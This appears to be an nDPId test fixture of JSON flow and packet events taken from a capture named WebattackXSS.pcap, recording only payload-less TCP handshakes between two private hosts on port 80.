+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346992144,"flow_last_seen":1499346992144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346992144,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1499346992144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346992144,"pkt":"ABm5CmnxAMGxFOsxCABFAAA855pAAD4G3jWsEAABwKgKMs0AAFBUEBhUAAAAAKACchAkSAAAAgQFtAQCCAoBOP\/OAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1499346992144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346992144,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzQA256uwVBAYVaAScSBtZwAAAgQFtAQCCAoD4tFFATj\/zgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1499346992145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346992145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA055tAAD4G3jysEAABwKgKMs0AAFBUEBhVNuersYAQAOUMbgAAAQEICgE4\/88D4tFF"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346993434,"flow_last_seen":1499346993434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346993434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1499346993434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346993434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QspAAD4GgwasEAABwKgKMs0OAFBi7kPbAAAAAKACchDokQAAAgQFtAQCCAoBOQERAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1499346993435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346993435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzQ7bbxEWYu5D3KAScSAmgAAAAgQFtAQCCAoD4tKIATkBEQEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1499346993435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346993435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QstAAD4Ggw2sEAABwKgKMs0OAFBi7kPc228RF4AQAOXFhwAAAQEICgE5ARED4tKI"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346994731,"flow_last_seen":1499346994731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346994731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1499346994731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346994731,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ErdAAD4GsxmsEAABwKgKMs0cAFAyGBDiAAAAAKACchBLDwAAAgQFtAQCCAoBOQJVAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1499346994731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346994731,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzRyBtZXkMhgQ46AScSBcpQAAAgQFtAQCCAoD4tPMATkCVQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1499346994732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346994732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ErhAAD4GsyCsEAABwKgKMs0cAFAyGBDjgbWV5YAQAOX7rAAAAQEICgE5AlUD4tPM"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346997314,"flow_last_seen":1499346997314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346997314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1499346997314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346997314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZWRAAD4GYGysEAABwKgKMs02AFBhbWG\/AAAAAKACchDIPAAAAgQFtAQCCAoBOQTbAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1499346997314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346997314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzTaSy6RrYW1hwKAScSC3rwAAAgQFtAQCCAoD4tZSATkE2wEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1499346997315,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346997315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZWVAAD4GYHOsEAABwKgKMs02AFBhbWHAksukbIAQAOVWtwAAAQEICgE5BNsD4tZS"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346998578,"flow_last_seen":1499346998578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346998578,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1499346998578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346998578,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K3xAAD4GmlSsEAABwKgKMs1EAFB2Xi1rAAAAAKACchDmVQAAAgQFtAQCCAoBOQYXAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1499346998579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346998579,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzUQbBzt5dl4tbKAScSC1QwAAAgQFtAQCCAoD4teOATkGFwEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1499346998579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346998579,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K31AAD4GmlusEAABwKgKMs1EAFB2Xi1sGwc7eoAQAOVUSwAAAQEICgE5BhcD4teO"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347001111,"flow_last_seen":1499347001111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347001111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1499347001111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347001111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kNhAAD4GNPisEAABwKgKMs1eAFDMzJhIAAAAAKACchAidwAAAgQFtAQCCAoBOQiQAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1499347001111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347001111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzV4q6d3azMyYSaAScSA8qAAAAgQFtAQCCAoD4toHATkIkAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1499347001112,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347001112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kNlAAD4GNP+sEAABwKgKMs1eAFDMzJhJKund24AQAOXbrwAAAQEICgE5CJAD4toH"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347002399,"flow_last_seen":1499347002399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347002399,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1499347002399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347002399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d7tAAD4GThWsEAABwKgKMs1sAFBA8H5pAAAAAKACchDG4gAAAgQFtAQCCAoBOQnSAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1499347002399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347002399,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzWx3BXtPQPB+aqAScSD2QAAAAgQFtAQCCAoD4ttJATkJ0gEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1499347002400,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347002400,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d7xAAD4GThysEAABwKgKMs1sAFBA8H5qdwV7UIAQAOWVSAAAAQEICgE5CdID4ttJ"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347003695,"flow_last_seen":1499347003695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347003695,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1499347003695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347003695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZUVAAD4GYIusEAABwKgKMs16AFBCXW5TAAAAAKACchDUOQAAAgQFtAQCCAoBOQsWAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1499347003695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347003695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzXqmA8avQl1uVKAScSCH9QAAAgQFtAQCCAoD4tyNATkLFgEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1499347003696,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347003696,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZUZAAD4GYJKsEAABwKgKMs16AFBCXW5UpgPGsIAQAOUm\/QAAAQEICgE5CxYD4tyN"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347006233,"flow_last_seen":1499347006233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347006233,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1499347006233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347006233,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WV1AAD4GbHOsEAABwKgKMs2UAFDN5FTMAAAAAKACchBfpAAAAgQFtAQCCAoBOQ2RAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1499347006233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347006233,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzZSBD41szeRUzaAScSBvHQAAAgQFtAQCCAoD4t8HATkNkQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1499347006234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347006234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WV5AAD4GbHqsEAABwKgKMs2UAFDN5FTNgQ+NbYAQAOUOJQAAAQEICgE5DZED4t8H"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347007496,"flow_last_seen":1499347007496,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347007496,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1499347007496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347007496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8xEhAAD4GAYisEAABwKgKMs2iAFDPCcqEAAAAAKACchDnfQAAAgQFtAQCCAoBOQ7MAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1499347007496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347007496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzaKR1tjLzwnKhaAScSCZlAAAAgQFtAQCCAoD4uBDATkOzAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1499347007496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347007496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0xElAAD4GAY+sEAABwKgKMs2iAFDPCcqFkdbYzIAQAOU4nAAAAQEICgE5DswD4uBD"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347010080,"flow_last_seen":1499347010080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347010080,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1499347010080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347010080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aVxAAD4GXHSsEAABwKgKMs28AFAhFXgOAAAAAKACchDlSAAAAgQFtAQCCAoBORFSAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1499347010080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347010080,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzbww\/OHGIRV4D6AScSDsuAAAAgQFtAQCCAoD4uLJATkRUgEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1499347010081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347010081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aV1AAD4GXHusEAABwKgKMs28AFAhFXgPMPzhx4AQAOWLvwAAAQEICgE5EVMD4uLJ"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347011349,"flow_last_seen":1499347011349,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347011349,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1499347011349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347011349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RzxAAD4GfpSsEAABwKgKMs3KAFCfKlWsAAAAAKACchCISQAAAgQFtAQCCAoBORKQAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1499347011350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347011350,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzcqa6hS4nypVraAScSDxmwAAAgQFtAQCCAoD4uQHATkSkAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1499347011350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347011350,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Rz1AAD4GfpusEAABwKgKMs3KAFCfKlWtmuoUuYAQAOWQowAAAQEICgE5EpAD4uQH"} 